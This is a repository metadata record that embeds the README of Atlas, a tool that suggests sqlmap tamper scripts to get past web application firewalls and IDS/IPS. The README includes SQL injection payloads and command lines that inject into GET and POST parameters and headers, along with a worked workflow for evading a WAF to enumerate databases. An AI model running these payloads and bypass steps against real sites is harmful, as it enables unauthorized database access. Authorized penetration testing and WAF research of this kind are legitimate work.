{"id":15034063,"url":"https://github.com/m4ll0k/atlas","last_synced_at":"2025-10-09T11:42:21.673Z","repository":{"id":48413802,"uuid":"151874757","full_name":"m4ll0k/Atlas","owner":"m4ll0k","description":"Quick SQLMap Tamper Suggester ","archived":false,"fork":false,"pushed_at":"2022-07-18T19:26:05.000Z","size":59,"stargazers_count":1376,"open_issues_count":19,"forks_count":270,"subscribers_count":42,"default_branch":"master","last_synced_at":"2025-05-23T07:08:23.916Z","etag":null,"topics":["hacking","injection","sql","sqlmap","tool"],"latest_commit_sha":null,"homepage":null,"language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/m4ll0k.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2018-10-06T19:31:23.000Z","updated_at":"2025-05-17T19:53:09.000Z","dependencies_parsed_at":"2022-08-12T19:50:19.787Z","dependency_job_id":null,"html_url":"https://github.com/m4ll0k/Atlas","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/m4ll0k/Atlas","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/m4ll0k%2FAtlas","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/m4ll0k%2FAtlas/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/m4ll0k%2FAtlas/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/m4ll0k%2FAtlas/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/m4ll0k","download_url":"https://codeload.github.com/m4ll0k/Atlas/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/m4ll0k%2FAtlas/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":279001300,"owners_count":26083059,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-10-09T02:00:07.460Z","response_time":59,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["hacking","injection","sql","sqlmap","tool"],"created_at":"2024-09-24T20:23:48.189Z","updated_at":"2025-10-09T11:42:21.645Z","avatar_url":"https://github.com/m4ll0k.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"Atlas - Quick SQLMap Tamper Suggester v1.0\r\n---\r\n\r\n__Atlas__ is an open source tool that can suggest sqlmap tampers to bypass WAF/IDS/IPS, the tool is based on returned status code.\r\n\r\n![atlas_main](https://i.imgur.com/G2bXF3A.png)\r\n\r\n\r\nScreen\r\n---\r\n![atlas_run](https://i.imgur.com/I6cXSKd.png)\r\n\r\nInstallation\r\n---\r\n```\r\n$ git clone https://github.com/m4ll0k/Atlas.git atlas\r\n$ cd atlas\r\n$ python atlas.py # python3+\r\n```\r\n\r\nUsage\r\n---\r\n```\r\n$ python atlas.py --url http://site.com/index.php?id=Price_ASC --payload=\"-1234 AND 4321=4321-- AAAA\" --random-agent -v\r\n```\r\n\r\ninjection point (with `%%inject%%`):\r\n\r\nget:\r\n```\r\n$ python atlas.py --url http://site.com/index/id/%%10%% --payload=\"-1234 AND 4321=4321-- AAAA\" --random-agent -v\r\n```\r\n\r\npost:\r\n```\r\n$ python atlas.py --url http://site.com/index/id/ -m POST -D 'test=%%10%%' --payload=\"-1234 AND 4321=4321-- AAAA\" --random-agent -v\r\n```\r\n\r\nheaders:\r\n```\r\n$ python atlas.py --url http://site.com/index/id/ -H 'User-Agent: mozilla/5.0%%inject%%' -H 'X-header: test' --payload=\"-1234 AND 4321=4321-- AAAA\" --random-agent -v\r\n```\r\n\r\n\r\ntampers concatenation:\r\n\r\n```\r\n$ python atlas.py --url http://site.com/index/id/%%10%% --payload=\"-1234 AND 4321=4321-- AAAA\" --concat \"equaltolike,htmlencode\" --random-agent -v\r\n```\r\n\r\nget tampers list:\r\n\r\n```\r\n$ python atlas.py -g\r\n```\r\n\r\n\r\nExample \r\n---\r\n1. Run SQLMap:\r\n```\r\n$ python sqlmap.py -u 'http://site.com/index.php?id=Price_ASC' --dbs --random-agent -v 3\r\n```\r\n![sqlmap](https://i.imgur.com/XP39Rqz.png)\r\n\r\n```Price_ASC') AND 8716=4837 AND ('yajr'='yajr``` is blocked by WAF/IDS/IPS, now trying with Atlas:\r\n```\r\n$ python atlas.py --url 'http://site.com/index.php?id=Price_ASC' --payload=\"') AND 8716=4837 AND ('yajr'='yajr\" --random-agent -v\r\n```\r\n![atlas_succ](https://i.imgur.com/U6qEnXp.png)\r\n\r\nAt this point:\r\n\r\n```\r\n$ python sqlmap.py -u 'http://site.com/index.php?id=Price_ASC' --dbs --random-agent -v 3 --tamper=versionedkeywords,...\r\n```\r\n\r\n#### The new Update get will soon stay updated\r\n$ BurpSuite\r\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fm4ll0k%2Fatlas","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fm4ll0k%2Fatlas","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fm4ll0k%2Fatlas/lists"}